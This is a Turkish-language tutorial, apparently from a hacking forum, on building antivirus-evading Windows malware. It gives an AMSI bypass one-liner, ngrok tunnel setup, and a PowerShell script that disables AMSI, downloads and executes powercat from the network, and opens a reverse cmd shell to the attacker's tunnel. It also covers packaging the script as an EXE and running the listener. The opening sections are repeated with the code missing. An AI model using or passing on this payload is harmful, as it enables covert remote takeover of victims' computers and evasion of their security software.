Antivirüs yazılımlarını etkisiz hale getirerek uzaktan kod yürütme (RCE) saldırıları gerçekleştirmek, siber güvenlik dünyasında önemli bir konudur. Bu makalede, AMSI (Anti-Malware Scan Interface) atlatma teknikleri ve PowerShell tabanlı yöntemler kullanarak, antivirüs yazılımlarını nasıl aşabileceğinizi ve %100 FUD (Tamamen Tespit Edilemez) bir zararlı yazılım oluşturabileceğinizi ele alacağız.
AMSI Nedir ve Neden Önemlidir?
AMSI, Windows işletim sistemlerinde zararlı yazılımların tespit edilmesi için kullanılan bir arayüzdür. PowerShell ve diğer betik tabanlı saldırılarda, AMSI, zararlı kodların çalıştırılmasını engelleyerek güvenliği sağlar. Bu nedenle, AMSI'yi atlatmak, saldırganlar için kritik bir adımdır.
AMSI'yi Atlatma Yöntemi
AMSI'yi atlatmak için, PowerShell üzerinden AMSI'nin belirli özelliklerini devre dışı bırakabiliriz. Aşağıdaki PowerShell kodu, AMSI'yi etkisiz hale getirmek için kullanılabilir:
Bu kod, AMSI'nin başlatılmasını engelleyerek, zararlı kodların tespit edilmesini önler.
Ngrok ile Güvenli Tünel Oluşturma
Ngrok, yerel sisteminizdeki bir portu internet üzerinden erişilebilir hale getiren bir araçtır. Bu sayede, saldırganlar, hedef sisteme uzaktan erişim sağlayabilir.
Tünel Başlatma:
Bu işlem sonucunda, size bir "Forwarding" adresi verilecektir (ör. tcp://0.tcp.ngrok.io:12345).
PowerShell ile Zararlı Yazılım Oluşturma
AMSI'yi atlattıktan ve Ngrok tünelini oluşturduktan sonra, hedef sisteme bağlanmak için PowerShell tabanlı bir zararlı yazılım oluşturabiliriz.
NGROK_HOST ve NGROK_PORT kısımlarını, Ngrok tarafından sağlanan bilgilerle değiştirin (ör. 0.tcp.ngrok.io ve 12345).
Hedef sistem, oluşturduğunuz zararlı yazılımı çalıştırdığında, belirttiğiniz Ngrok tüneli üzerinden sizin sisteminize bağlanacaktır. Bu bağlantıyı dinlemek için powercat aracını kullanabilirsiniz:
Bu komut, 8000 numaralı portu dinleyecek ve gelen bağlantıları kabul edecektir.
AMSI Nedir ve Neden Önemlidir?
AMSI, Windows işletim sistemlerinde zararlı yazılımların tespit edilmesi için kullanılan bir arayüzdür. PowerShell ve diğer betik tabanlı saldırılarda, AMSI, zararlı kodların çalıştırılmasını engelleyerek güvenliği sağlar. Bu nedenle, AMSI'yi atlatmak, saldırganlar için kritik bir adımdır.
AMSI'yi Atlatma Yöntemi
AMSI'yi atlatmak için, PowerShell üzerinden AMSI'nin belirli özelliklerini devre dışı bırakabiliriz. Aşağıdaki PowerShell kodu, AMSI'yi etkisiz hale getirmek için kullanılabilir:
Kod:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)Bu kod, AMSI'nin başlatılmasını engelleyerek, zararlı kodların tespit edilmesini önler.
Ngrok ile Güvenli Tünel Oluşturma
Ngrok, yerel sisteminizdeki bir portu internet üzerinden erişilebilir hale getiren bir araçtır. Bu sayede, saldırganlar, hedef sisteme uzaktan erişim sağlayabilir.
- Ngrok Kurulumu:
- Ngrok'un resmi web sitesinden aracı indirin ve çalıştırın.
- Ngrok Yapılandırması:
- Ngrok hesabınızdan "authtoken" alın ve aşağıdaki komutla yapılandırın:
Kod:
./ngrok authtoken YOUR_AUTHTOKENTünel Başlatma:
- 8000 numaralı portu tünellemek için aşağıdaki komutu kullanın:
Kod:
./ngrok tcp 8000PowerShell ile Zararlı Yazılım Oluşturma
AMSI'yi atlattıktan ve Ngrok tünelini oluşturduktan sonra, hedef sisteme bağlanmak için PowerShell tabanlı bir zararlı yazılım oluşturabiliriz.
- PowerShell Betiği:
- Aşağıdaki kodu bir metin dosyasına kaydedin ve uzantısını .ps1 olarak değiştirin:
Kod:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c NGROK_HOST -p NGROK_PORT -e cmdNGROK_HOST ve NGROK_PORT kısımlarını, Ngrok tarafından sağlanan bilgilerle değiştirin (ör. 0.tcp.ngrok.io ve 12345).
- etiği EXE'ye Dönüştürme:
- ps2exe gibi araçlar kullanarak .ps1 dosyasını .exe formatına dönüştürebilirsiniz.
Hedef sistem, oluşturduğunuz zararlı yazılımı çalıştırdığında, belirttiğiniz Ngrok tüneli üzerinden sizin sisteminize bağlanacaktır. Bu bağlantıyı dinlemek için powercat aracını kullanabilirsiniz:
Kod:
powercat -l -p 8000 -rep